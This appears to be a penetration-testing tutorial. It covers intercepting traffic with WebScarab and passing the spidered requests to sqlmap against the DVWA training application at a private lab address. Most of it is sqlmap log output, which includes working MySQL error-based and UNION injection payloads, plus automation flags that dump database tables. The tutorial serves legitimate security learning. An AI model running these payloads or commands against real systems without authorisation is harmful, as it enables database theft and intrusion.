web application – webscarab

WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser.

backtrack 5r1

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

1. Tools / tick Use full-featured interface / close WebScarab and then restart it.

2. Proxy tab / Listeners tab / shows which port WebScarab listens on for interception.

3. Point your browser at the port WebScarab uses.

Firefox: Edit / Preferences / Advanced / Network / Settings / tick Manual proxy configuration, then set the port. OK / Close.

4. Back in WebScarab: Proxy tab / Manual Edit / tick Intercept requests.

5. Surf in your browser. You will get a pop-up from WebScarab; click the Raw tab to see the intercepted request.

———————————————————–

Open the WebScarab results in sqlmap and test the possible injection points.

1. Spider the site with WebScarab: Summary tab / right-click the desired URL and choose Spider tree.

2. WebScarab stores its results in /tmp/webscarab1111.tmp/conversations

3. To run these results through sqlmap:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:46:32

[01:46:32] [INFO] sqlmap parsed 9 testable requests from the targets list
[01:46:32] [INFO] sqlmap got a total of 9 targets
url 1:
POST http://ip-address:80/dvwa/login.php
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
POST data: username=root&password=password&Login=Login
do you want to test this url? [Y/n/q]
> n
url 2:
GET http://ip-address:80/dvwa/index.php
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 3:
GET http://ip-address:80/dvwa/dvwa/js/dvwaPage.js
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 4:
GET http://ip-address:80/dvwa/dvwa/css/main.css
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 5:
POST dvwa/dvwa/css/main.csss-ffox&appver=9.0.1&pver=2.2&wrkey=AKEgNivfOeoCnacqL0R-7j-OaWCqLrzSkU7NQubY8ONjn0adOjkAKZvaMq4BTZQqfRmiSSyTbMAzGPMdEBJLHNN-IWcmF9MBhw==
POST data:
do you want to test this url? [Y/n/q]
> n
url 6:
GET http://ip-address:80/dvwa/setup.php
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 7:
GET http://ip-address:80/dvwa/security.php
Cookie: PHPSESSID=0121gfds42141happy14jd; security=high
do you want to test this url? [Y/n/q]
> n
url 8:
GET http://ip-address:80/dvwa/vulnerabilities/sqli/
Cookie: PHPSESSID=0121gfds42141happy14jd; security=low
do you want to test this url? [Y/n/q]
> n
url 9:
GET http://ip-address:80/dvwa/vulnerabilities/sqli/?id=&Submit=Submit
Cookie: PHPSESSID=0121gfds42141happy14jd; security=low
do you want to test this url? [Y/n/q]
> y
[01:46:58] [INFO] testing url http://ip-address:80/dvwa/vulnerabilities/sqli/?id=&Submit=Submit
[01:46:58] [INFO] using ‘/pentest/database/sqlmap/output/ip-address/session’ as session file
[01:46:58] [INFO] using ‘/pentest/database/sqlmap/output/results-2120_42pm.csv’ as results file
[01:46:58] [INFO] testing connection to the target url
[01:47:08] [INFO] testing if the url is stable, wait a few seconds
[01:47:19] [INFO] url is stable
[01:47:19] [INFO] testing if GET parameter ‘id’ is dynamic
[01:47:29] [WARNING] GET parameter ‘id’ appears to be not dynamic
[01:47:39] [WARNING] heuristic test shows that GET parameter ‘id’ might not be injectable
[01:47:39] [INFO] testing sql injection on GET parameter ‘id’
[01:47:39] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[01:48:49] [INFO] heuristics detected web page charset ‘ascii’
[01:49:30] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’
[01:50:10] [INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’ injectable
[01:50:10] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[01:50:20] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind’
[01:50:30] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 10 columns’
[01:52:10] [INFO] target url appears to be UNION injectable with 2 columns
[01:52:30] [INFO] GET parameter ‘id’ is ‘MySQL UNION query (NULL) – 1 to 10 columns’ injectable
GET parameter ‘id’ is vulnerable. Do you want to keep testing the others? [y/N] y
[01:52:48] [INFO] testing if GET parameter ‘Submit’ is dynamic
[01:52:58] [WARNING] GET parameter ‘Submit’ appears to be not dynamic
[01:53:08] [WARNING] heuristic test shows that GET parameter ‘Submit’ might not be injectable
[01:53:08] [INFO] testing sql injection on GET parameter ‘Submit’
[01:53:08] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[01:55:08] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE or HAVING clause’
[01:55:48] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[01:56:28] [INFO] testing ‘MySQL > 5.0.11 AND time-based blind’
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[01:57:35] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 10 columns’
[02:04:16] [INFO] testing ‘Generic UNION query (NULL) – 1 to 10 columns’
[02:10:57] [WARNING] GET parameter ‘Submit’ is not injectable
sqlmap identified the following injection points with a total of 135 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=’ AND (SELECT 6575 FROM(SELECT COUNT(*),CONCAT(CHAR(58,102,102,122,58),(SELECT (CASE WHEN (6575=6575) THEN 1 ELSE 0 END)),CHAR(58,104,120,116,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘hxJQ’=’hxJQ&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=’ UNION ALL SELECT NULL, CONCAT(CHAR(58,102,102,122,58),IFNULL(CAST(CHAR(113,66,98,90,65,112,121,88,103,78) AS CHAR),CHAR(32)),CHAR(58,104,120,116,58))# AND ‘KNgC’=’KNgC&Submit=Submit

[02:10:57] [INFO] manual usage of GET payloads requires url encoding
do you want to exploit this SQL injection? [Y/n] y
[02:33:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[02:33:22] [INFO] you can find results of scanning in multiple targets mode inside the CSV file ‘/pentest/database/sqlmap/output/results-2120_42pm.csv’

[*] shutting down at: 02:33:22

4. The sqlmap results can be found in /pentest/database/sqlmap/output

http://www.myexploit.wordpress.com/information-gathering-sqlmap/

————————————————————————————-

The below options with automation were shown to me by The Gentleman Hackers Club. Show your support and click on their link!

https://thegentlemanhackersclub.com//

These options will allow sqlmap to test all user-defined URLs without stopping at each question.

NOTE !! (Use the --scope=$regex option or it will attack everything listed under your webscarab1111.tmp/conversations.)

--batch = selects the default/recommended answer (Y) for every question instead of prompting

--replicate = when an injection is found, replicate the database tables into a local SQLite file

--beep = beeps when an SQL injection is found.

--scope=$regex = only attacks targets in your defined scope, e.g. --scope=^192.168.6.65$ (will only look at URLs for that IP address)

-o = optimize

-t = logs the actual HTTP traffic (to the file given as its argument)

--eta = shows the estimated time of arrival (ETA) for each output

-v 3 = verbosity level 3, shows the payloads injected (on screen)

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab26244.tmp/conversations --batch --beep --replicate --scope=^192.168.6.65$

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 52:05

[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] using regular expression '^192.168.6.65$' for filtering targets
[52:05] [INFO] sqlmap parsed 12 testable requests from the targets list
[52:05] [INFO] sqlmap got a total of 12 targets
[52:05] [INFO] url 1:
GET http://192.168.6.65:80/dvwa/vulnerabilities/brute/?username=&password=&Login=Login
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:05] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/brute/?username=&password=&Login=Login
[52:05] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:05] [INFO] using '/pentest/database/sqlmap/output/results-08102012_0452pm.csv' as results file
[52:05] [INFO] testing connection to the target url
[52:05] [INFO] testing if the url is stable, wait a few seconds
[52:06] [INFO] url is stable
[52:06] [INFO] testing if GET parameter 'username' is dynamic
[52:06] [WARNING] GET parameter 'username' appears to be not dynamic
[52:07] [INFO] heuristics detected web page charset 'ascii'
[52:07] [INFO] heuristic test shows that GET parameter 'username' might be injectable (possible DBMS: MySQL)
[52:07] [INFO] testing sql injection on GET parameter 'username'
[52:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:07] [INFO] GET parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[52:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:08] [INFO] target url appears to be UNION injectable with 6 columns
[52:08] [INFO] GET parameter 'username' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
[52:08] [INFO] GET parameter 'username' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=' AND (SELECT 7777 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,98,106,58),(SELECT (CASE WHEN (7777=7777) THEN 1 ELSE 0 END)),CHAR(58,111,103,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eAAu'='eAAu&password=&Login=Login

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: username=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,111,98,106,58),IFNULL(CAST(CHAR(102,74,90,71,88,112,109,116,89,111) AS CHAR),CHAR(32)),CHAR(58,111,103,121,58))# AND 'uoQV'='uoQV&password=&Login=Login
---

[52:08] [INFO] manual usage of GET payloads requires url encoding
[52:09] [INFO] do you want to exploit this SQL injection? [Y/n] Y
[52:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[52:09] [INFO] url 2:
GET http://192.168.6.65:80/dvwa/vulnerabilities/sqli/
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:09] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/sqli/
[52:09] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters through --data option
[52:09] [INFO] do you want to try URI injections in the target url itself? [Y/n/q] Y
[52:09] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:09] [INFO] testing connection to the target url
[52:09] [INFO] testing if the url is stable, wait a few seconds
[52:10] [INFO] url is stable
[52:10] [INFO] testing if URI parameter '#1*' is dynamic
[52:10] [INFO] confirming that URI parameter '#1*' is dynamic
[52:10] [INFO] URI parameter '#1*' is dynamic
[52:10] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable
[52:10] [INFO] testing sql injection on URI parameter '#1*'
[52:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:10] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:10] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:10] [INFO] testing 'Oracle AND time-based blind'
[52:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:11] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:11] [WARNING] URI parameter '#1*' is not injectable
[52:11] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:11] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 135 times
[52:11] [INFO] url 3:
GET http://192.168.6.65:80/dvwa/vulnerabilities/sqli/?id=&Submit=Submit
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:11] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/sqli/?id=&Submit=Submit
[52:11] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:11] [INFO] testing connection to the target url
[52:12] [INFO] testing if the url is stable, wait a few seconds
[52:13] [INFO] url is stable
[52:13] [INFO] testing if GET parameter 'id' is dynamic
[52:13] [WARNING] GET parameter 'id' appears to be not dynamic
[52:13] [INFO] heuristics detected web page charset 'ascii'
[52:13] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[52:13] [INFO] testing sql injection on GET parameter 'id'
[52:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:13] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[52:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:14] [INFO] target url appears to be UNION injectable with 2 columns
[52:14] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
[52:14] [INFO] GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=' AND (SELECT 5564 FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,102,119,58),(SELECT (CASE WHEN (5564=5564) THEN 1 ELSE 0 END)),CHAR(58,117,115,112,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LRKO'='LRKO&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=' UNION ALL SELECT CONCAT(CHAR(58,115,102,119,58),IFNULL(CAST(CHAR(84,87,107,88,111,117,108,74,85,104) AS CHAR),CHAR(32)),CHAR(58,117,115,112,58)), NULL# AND 'ZrYe'='ZrYe&Submit=Submit
---

[52:14] [INFO] manual usage of GET payloads requires url encoding
[52:14] [INFO] do you want to exploit this SQL injection? [Y/n] Y
[52:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[52:14] [INFO] url 4:
GET http://192.168.6.65:80/dvwa/vulnerabilities/xss_r/
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:14] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/xss_r/
[52:14] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters through --data option
[52:14] [INFO] do you want to try URI injections in the target url itself? [Y/n/q] Y
[52:14] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:14] [INFO] testing connection to the target url
[52:14] [INFO] testing if the url is stable, wait a few seconds
[52:16] [INFO] url is stable
[52:16] [INFO] testing if URI parameter '#1*' is dynamic
[52:16] [INFO] confirming that URI parameter '#1*' is dynamic
[52:16] [INFO] URI parameter '#1*' is dynamic
[52:16] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable
[52:16] [INFO] testing sql injection on URI parameter '#1*'
[52:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:17] [INFO] testing 'Oracle AND time-based blind'
[52:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:17] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:18] [WARNING] URI parameter '#1*' is not injectable
[52:18] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:18] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 135 times
[52:18] [INFO] url 5:
GET http://192.168.6.65:80/dvwa/vulnerabilities/xss_r/?name=
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:18] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/xss_r/?name=
[52:18] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:18] [INFO] testing connection to the target url
[52:18] [INFO] testing if the url is stable, wait a few seconds
[52:19] [INFO] url is stable
[52:19] [INFO] testing if GET parameter 'name' is dynamic
[52:19] [WARNING] GET parameter 'name' appears to be not dynamic
[52:19] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable
[52:19] [INFO] testing sql injection on GET parameter 'name'
[52:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:20] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:20] [INFO] testing 'Oracle AND time-based blind'
[52:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:21] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:22] [WARNING] GET parameter 'name' is not injectable
[52:22] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:22] [INFO] url 6:
GET http://192.168.6.65:80/dvwa/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:22] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/upload/
[52:22] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters through --data option
[52:22] [INFO] do you want to try URI injections in the target url itself? [Y/n/q] Y
[52:22] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:22] [INFO] testing connection to the target url
[52:22] [INFO] testing if the url is stable, wait a few seconds
[52:23] [INFO] url is stable
[52:23] [INFO] testing if URI parameter '#1*' is dynamic
[52:23] [INFO] confirming that URI parameter '#1*' is dynamic
[52:23] [INFO] URI parameter '#1*' is dynamic
[52:23] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable
[52:23] [INFO] testing sql injection on URI parameter '#1*'
[52:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:24] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:24] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:24] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:24] [INFO] testing 'Oracle AND time-based blind'
[52:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:25] [WARNING] URI parameter '#1*' is not injectable
[52:25] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:25] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 135 times
[52:25] [INFO] url 7:
GET http://192.168.6.65:80/dvwa/dvwa/js/dvwaPage.js
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:25] [INFO] testing url http://192.168.6.65:80/dvwa/dvwa/js/dvwaPage.js
[52:25] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:25] [INFO] testing connection to the target url
[52:25] [INFO] testing if the url is stable, wait a few seconds
[52:26] [INFO] url is stable
[52:26] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:26] [INFO] url 8:
GET http://192.168.6.65:80/dvwa/dvwa/css/main.css
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:26] [INFO] testing url http://192.168.6.65:80/dvwa/dvwa/css/main.css
[52:26] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:26] [INFO] testing connection to the target url
[52:26] [ERROR] unable to retrieve page content, skipping to the next url
[52:26] [WARNING] HTTP error codes detected during testing:
304 (Not Modified) - 1 times
[52:26] [INFO] url 9:
GET http://192.168.6.65:80/dvwa/vulnerabilities/csrf/
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:26] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/csrf/
[52:26] [WARNING] you've provided target url without any GET parameters (e.g. www.site.com/article.php?id=1) and without providing any POST parameters through --data option
[52:26] [INFO] do you want to try URI injections in the target url itself? [Y/n/q] Y
[52:26] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:26] [INFO] testing connection to the target url
[52:26] [INFO] testing if the url is stable, wait a few seconds
[52:28] [INFO] url is stable
[52:28] [INFO] testing if URI parameter '#1*' is dynamic
[52:28] [INFO] confirming that URI parameter '#1*' is dynamic
[52:28] [INFO] URI parameter '#1*' is dynamic
[52:28] [WARNING] heuristic test shows that URI parameter '#1*' might not be injectable
[52:28] [INFO] testing sql injection on URI parameter '#1*'
[52:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[52:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[52:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[52:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[52:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[52:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[52:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[52:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[52:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[52:28] [INFO] testing 'Oracle AND time-based blind'
[52:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[52:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[52:29] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[52:29] [WARNING] URI parameter '#1*' is not injectable
[52:29] [ERROR] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details, skipping to the next url
[52:29] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 135 times
[52:29] [INFO] url 10:
GET http://192.168.6.65:80/dvwa/vulnerabilities/csrf/?password_new=&password_conf=&Change=Change
Cookie: security=low; PHPSESSID=qi8g2n5h9o7t9mdlm8smr79m02
do you want to test this url? [Y/n/q]
> Y
[52:29] [INFO] testing url http://192.168.6.65:80/dvwa/vulnerabilities/csrf/?password_new=&password_conf=&Change=Change
[52:29] [INFO] using '/pentest/database/sqlmap/output/192.168.6.65/session' as session file
[52:29] [INFO] testing connection to the target url
[52:30] [INFO] testing if the url is stable, wait a few seconds
[52:31] [INFO] url is stable
[52:31] [INFO] testing if GET parameter 'password_new' is dynamic
[52:31] [WARNING] GET parameter 'password_new' appears to be not dynamic
[52:31] [WARNING] heuristic test shows that GET parameter 'password_new' might not be injectable
[52:31] [INFO] testing sql injection on GET parameter 'password_new'
[52:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[52:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[52:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
